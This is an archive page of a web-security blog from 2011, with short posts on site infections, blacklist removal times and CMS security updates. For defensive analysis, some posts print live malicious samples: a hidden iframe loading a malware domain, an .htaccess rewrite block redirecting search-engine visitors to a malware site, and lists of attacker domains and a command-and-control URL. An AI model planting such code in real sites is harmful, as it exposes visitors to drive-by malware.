Malware Being Called From Your php.ini File

December 22, 2011 by 4 Comments

Is your site infected with malware, and you can’t find it anywhere? It might be a good idea to search outside of your web directory, and look in your main configuration files (specially if you are on a dedicated/VPS server).

We are seeing an increased number of infected sites with malicious iframes, similar to this one:

<style type=”text/css”>#doxig {width: 10px;height: 10px;frameborder: no;visibility: hidden;scrolling: no;}</style><iframe id=”doxig” src="http://1306a95ajbr.liga4giurgiu.info/ad.jpg?2"></iframe>

These specific strings aren’t typically found anywhere in the website files, which is very concerning. We’re finding that entire servers are being compromised, and the main server php.ini file (/etc/php/php.ini) has the following setting added:


Read More

Filed Under: hacked, Malware, malware_updates, vulnerability Tagged With: , , ,

Ask Sucuri: How Long Does It Take For a Site To Be Removed From Google’s Blacklist? – Updated

December 14, 2011 by 1 Comment

If you have any questions about malware, blacklisting, or security in general, send it over to us: contact@sucuri.net and we will answer here. For all the “Ask Sucuri” answers, click here

This is an update to our previous post about Google blacklisting. We have some updated numbers to share.

Question: My site was hacked and we cleaned and secured it properly. We also scanned it, and it is showing up as clean. However, it is still blacklisted by Google. How long until they remove us?

Answer: This is a very common question. In fact, every time we clear a hacked site, their owner asks us the same question: How long until that scary red warning sign is gone?

To give a solid answer to our clients, we started to time how long it takes from when the review submission is requested, until the site is reviewed and removed by Google. We have now measured a few hundred blacklist removals and we have some good numbers to back up our tests.

Current Results:

  • Average time from submission to removal: 440 minutes (about 7 hours)
  • Maximum time: 792 (13 hours)
  • Minimum time: 290 (a bit less than 5 hours)

On average, it takes Google around 7 hours to clear your “bad” website from their lists. For our lucky clients, it takes roughly 5-6 hours. Another important point that some people forget is that you need to request a review! Google will not automatically remove a site once cleaned.

How do you increase your odds of getting cleared faster?

  1. Make sure to clean everything up!
  2. Do not remove the infected files, fix them. If you remove them, they will 404, and a 404 will delay the verification (even if you need to leave the file with a 0-size, don’t remove it until after the site is de-listed).
  3. Follow best practices to increase security on your site so that you minimize the risk of reinfection.

That’s it. Let us know if you have any questions or comments.

Is your site hacked? Blacklisted? We are here to help! We can get your sites cleaned up and secured right away!

Filed Under: Ask, blacklist, blacklisted, google, sucuri Tagged With: , , , ,

WordPress 3.3 is Out

December 12, 2011 by Leave a Comment

For all our WordPress users, please remember to update to WordPress 3.3 that was just released. It should be a quick 1-click process in your dashboard, and nobody have an excuse not to do so.

And if you are currently using any version before 3.2.1, you better run!

Thanks,

Filed Under: WordPress

The New (and Old) .htaccess Attacks – Now Using .in Domains

November 28, 2011 by 2 Comments

We have been talking about .htaccess redirections for a while. A site gets compromised and the attackers modify the .htaccess file(s) to redirect any search engine traffic to a different (malicious) page that attempts to compromise the browser / computer of anyone visiting the site.

For the most part, the attackers have been using .ru domains to distribute the malware. Here are some of the domains used:

face-apple.ru
fightagent.ru
power-update.ru
syntaxswitch.ru
window-switch.ru


Read More

Filed Under: hacked, htaccess, Malware, malware_updates, WordPress Tagged With: , , , , ,

Dre Armeda: WordPress End-User Security

November 19, 2011 by 6 Comments

Sucuri Co-Founder Dre Armeda did a great presentation at WordCamp Chicago about end-user security for WordPress users.

Check out the video here:

Dre will also be speaking at WordCamp Las Vegas 2011, make sure to say hi if you’re attending.

Filed Under: security, sucuri, WordPress Tagged With: , ,

Joomla 1.5.25/1.7.3 Released (Security Update)

November 15, 2011 by 3 Comments

If you are using Joomla, now is the time to update it. A new version was just released for the 1.5.x and 1.7.x branches fixing a high priority security issue that will allow remote users to change other users passwords (even on admin account).

More details on the Joomla website and here.

Description:
Weak random number generation during password reset leads to possibility of changing a user’s password.

Read More

Filed Under: joomla, vulnerability Tagged With: ,

Htaccess Redirection to Sweepstakesandcontestsinfo dot com

November 14, 2011 by 3 Comments

Last week we started to see a large increase in the number of sites compromised with a .htaccess redirection to http://sweepstakesandcontestsinfo.com/nl-in.php?nnn=555.

This domain has been used to distribute malware for a while (generally through javascript injections), but only in the last few days did we start seeing it being done via .htaccess.

* The malicious site(s) are not blacklisted by Google (or any major blacklist) at this time, so it makes spreading the malware pretty simple for the attackers.

This is what gets added to the .htaccess of the compromised sites:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*(msn|live|altavista|excite|ask|aol|google|mail|bing|yahoo).*$ [NC]
RewriteRule .* http://sweepstakesandcontestsinfo.com/nl-in.php?nnn=555 [R,L]
</IfModule>


Read More

Filed Under: hacked, htaccess, Malware, malware_updates, vulnerability Tagged With: , , , ,

Timthumb.php Mass Infection – Aftermath – Part I

October 28, 2011 by 30 Comments

If you use WordPress you’re probably aware of the mass infection caused by a vulnerability in the timthumb.php script, a photo manipulation script included in many themes and plugins.

Sites were compromised with anything from malware to Blackhat SEO spam, to .htaccess redirections.

It would be useful to gain metrics based on the amount of sites that were truly affected, the problem is that it’s very hard to estimate how many sites were in fact compromised. 1 thousand, 100 thousand, 1 million? Who knows for sure.

We found a way to get close to the actual numbers. For the last couple of months most of the sites compromised had their wp-settings.php modified with a function to contact the URL http://91.196.216.30/bt.php for more information on what to do with the site (display malware, spam, etc). Yes, kinda like a command and control site.

Read More

Filed Under: hacked, Malware, malware_updates, vulnerability, WordPress Tagged With: , , , ,

MyBB web site and downloads compromised

October 25, 2011 by Leave a Comment

It’s not good when your site gets infected with malware, specially if you’re a provider of software to many. If you are using MyBB (forum software), please be aware that their web site hacked and the software download packages compromised:

There was unfortunately a vulnerability in the CMS which powers the MyBB home page and downloads system. Using this vulnerability a hacker was able to add a backdoor to one of the files, allowing them to execute arbitrary PHP and manipulate the release packages. The CMS was custom written a number of years ago, however we believe a 3rd party framework used by the CMS contributed to the vulnerability. The CMS shares no code with MyBB so there should be no concern that these events indicate a vulnerability in MyBB. The server is also configured to isolate the subdomains belonging to the MyBB website, so it is unlikely that any data from the community forums or other sections of the site was compromised.

The MyBB team recommend these actions:

  1. Download the latest release of MyBB.
  2. Replace ./index.php (in the root folder of your forum) with the one in the download (./Upload/index.php).
  3. Remove the ./install/ folder

*We are trying to find more information about the backdoor that was added, but no luck yet. If you find a link with the affected version, let us know.

Filed Under: backdoors, vulnerability Tagged With: ,

Evil backdoors – Part II

October 14, 2011 by 16 Comments

A few months ago we did a post about backdoors, explaining how they work and how to look for them. If you didn’t read it, take a read here:

ASK Sucuri: What about the backdoors?

However, we still see on online forums people recommending to search for “eval ( base64_decode” and things like that when searching for backdoors. If you review our examples in that article, you can see that it would miss a few of them.

Today we started to see another type of backdoor that most signature-based tools can’t find. Take a look:

Read More

Filed Under: backdoors, hacked, Malware, malware_updates, WordPress Tagged With: , , ,
«Older Posts
Newer Posts»